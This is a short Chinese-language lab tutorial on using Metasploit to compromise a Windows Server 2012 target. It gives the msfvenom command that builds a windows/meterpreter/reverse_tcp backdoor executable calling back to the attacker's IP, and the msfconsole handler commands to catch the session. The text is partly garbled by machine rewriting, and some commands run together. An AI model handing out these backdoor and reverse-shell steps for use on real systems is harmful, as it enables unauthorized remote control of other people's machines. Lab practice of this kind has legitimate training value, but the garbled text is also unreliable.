0x01 知识点

MSF工具的利用 MSF天生Windows木马后门

0x02 实验环境:

msfconsole生成php网页木马MSFMsfvenom生成Windows后门木马试验 Ruby

攻击机kali 2022(ip:192.168.190.131)

靶机Server 2012 (ip:192.168.190.132)

0x03 Windows后门木马实验

1.天生Windows后门

在攻击机kaili 2022中输入:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.190.131LPORT=5555 -f exe > /tmp/shell.exe

(天生一个名为shell.exe的msf后门文件)

2.配置、监听、实行

msfconsole #启动msfuse exploit/multi/handler #利用监听模块set payload windows/meterpreter/reverse_tcp #利用和木马相同的payloadset lhost 192.168.190.131 #kali的ipset lport 5555 #木马的端口run #实行

3.目标机器实行木马后门文件shell.exe

将shell.exe木马文件拷贝至靶机server 2012(ip:192.168.190.132)中然后实行。

4.目标机器接管MSF会话

Msf变成meterpreter证明实行成功,输入sysinfo验证

0x04 横向渗透

后渗透阶段可以实行命令获取内网信息等